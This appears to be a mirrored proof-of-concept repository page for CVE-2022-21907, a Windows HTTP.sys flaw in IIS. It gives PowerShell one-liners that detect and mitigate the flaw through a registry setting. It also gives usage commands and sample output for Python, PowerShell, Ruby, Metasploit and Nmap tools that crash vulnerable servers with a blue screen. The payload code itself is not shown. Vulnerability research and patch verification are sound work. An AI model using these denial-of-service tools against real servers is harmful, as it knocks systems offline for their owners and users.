关联漏洞
标题:Microsoft Windows 安全漏洞 (CVE-2022-21907)Description:Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。 Microsoft Windows HTTP Protocol Stack存在安全漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Ser
Description
CVE-2022-21907: detection, protection, exploitation and demonstration. Exploitation: Powershell, Python, Ruby, NMAP and Metasploit. Detection and protection: Powershell. Demonstration: Youtube.
介绍
# CVE-2022-21907
## Description
1. This repository detects a system vulnerable to `CVE-2022-21907` (**CVSS:3.1 9.8**) and protects against this vulnerability if desired. I offer 2 powershell codes in 1 line.
2. I propose pure python, powershell, ruby scripts and metasploit, nmap modules to attack a vulnerable IIS Web Server (perform a DOS attack to crash (blue screen) the server).
## Detection and protection
### Script
This script launch 2 online code for detection and 2 online for protection.
```text
cmd> powershell ./detection_protection_cve2022_21907.ps1
CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
Not vulnerable to CVE-2022-2190
Not vulnerable to CVE-2022-2190
Not vulnerable to CVE-2022-2190
Not vulnerable to CVE-2022-2190
cmd>
```
### Detect only (oneline)
```powershell
$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !")
```
```powershell
$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"}
```
### Detect and protect (oneline)
Run this powershell line **as administrator** to protect your computer/server.
```powershell
$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and ($(Write-Host "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0") -or $(Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0))
```
```powershell
$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"}
```
## Exploit: DOS - BlueScreen
Demonstrations (using powershell scripts, metasploit and nmap) on youtube:
[](https://www.youtube.com/watch?v=kaZrfpsh3ds)
[](https://www.youtube.com/watch?v=-HHrdhdt3QU)
[](https://www.youtube.com/watch?v=-mirw5-IPHQ)
### Python
```bash
python3 CVE202221907.py
# OR
chmod u+x CVE202221907.py
./CVE202221907.py
python3 CVE202221907.py <target>
# OR
chmod u+x CVE202221907.py
./CVE202221907.py <target>
python3 CVE202221907.py 10.10.10.10
# OR
chmod u+x CVE202221907.py
./CVE202221907.py 10.10.10.10:8000
# OR
python3 CVE202221907.py mywebservername
```
```text
~# python CVE202221907.py
CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
Target: 10.10.10.10
[+] http://10.10.10.10 is UP. Send payload...
[+] http://10.10.10.10 is DOWN. 10.10.10.10 is vulnerable to CVE-2022-21907.
~#
```
### Powershell
```powershell
powershell ./CVE-2022-21907.ps1
powershell ./CVE-2022-21907.ps1 mywebservername
powershell ./CVE-2022-21907.ps1 -Target 10.10.10.10
```
```text
cmd> powershell ./CVE-2022-21907.ps1
cmdlet CVE-2022-21907.ps1 at command pipeline position 1
Supply values for the following parameters:
target: 10.10.10.10:8000
CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
cmd>
```
### Ruby
```bash
ruby CVE-2022-21907.rb
ruby CVE-2022-21907.rb 10.10.10.10
```
```text
~# ruby CVE-2022-21907.rb
CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
Host (target): 10.10.10.10
[+] Target: 10.10.10.10 is vulnerable and down.
~#
```
### Metasploit
#### Python module
```text
msf6 > use exploit/windows/iis/py_dos_iis_2022_21907
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > exploit
[*] Running module against 127.0.0.1
[*] Starting server...
[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Trying first connection...
[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - First connection OK. Sending payload...
[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) >
```
#### Ruby module
```text
msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit
[*] Running module against 10.10.10.10
[+] Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) >
```
### Nmap
```bash
nmap -p 80 --script dos_iis_2022_21907 10.10.10.10
```
```text
~# nmap -p 80 --script dos_iis_2022_21907 10.10.10.10
80/tcp open http
| dos_iis_2022_21907:
| VULNERABLE:
| IIS CVE-2022-21907 DOS
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2022-21907
| The IIS Web Server contains a RCE vulnerability. This script
| exploits this vulnerability with a DOS attack
| (causes a Blue Screen).
|
| Disclosure date: 2022-01-11
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2022-21907
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907
|_ https://github.com/mauricelambert/CVE-2022-21907
```
## Sources
- [Microsoft](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907)
- [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2022-21907)
- [Pure ruby script documentation](https://mauricelambert.github.io/info/ruby/code/CVE-2022-21907/CVE202221907.html)
## Licence
Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
文件快照
[4.0K] /data/pocs/d55f204cd1d58c7f298bca9cab359e58bde873be
├── [2.6K] CVE-2022-21907.ps1
├── [3.1K] CVE202221907.py
├── [4.1K] CVE-2022-21907.rb
├── [2.6K] detection_protection_cve2022_21907.ps1
├── [2.8K] dos_iis_2022_21907.nse
├── [ 35K] LICENSE.txt
├── [ 330] payload.txt
├── [3.8K] py_dos_iis_2022_21907.py
├── [2.4K] rb_dos_iis_2022_21907.md
├── [3.1K] rb_dos_iis_2022_21907.rb
└── [6.9K] README.md
0 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。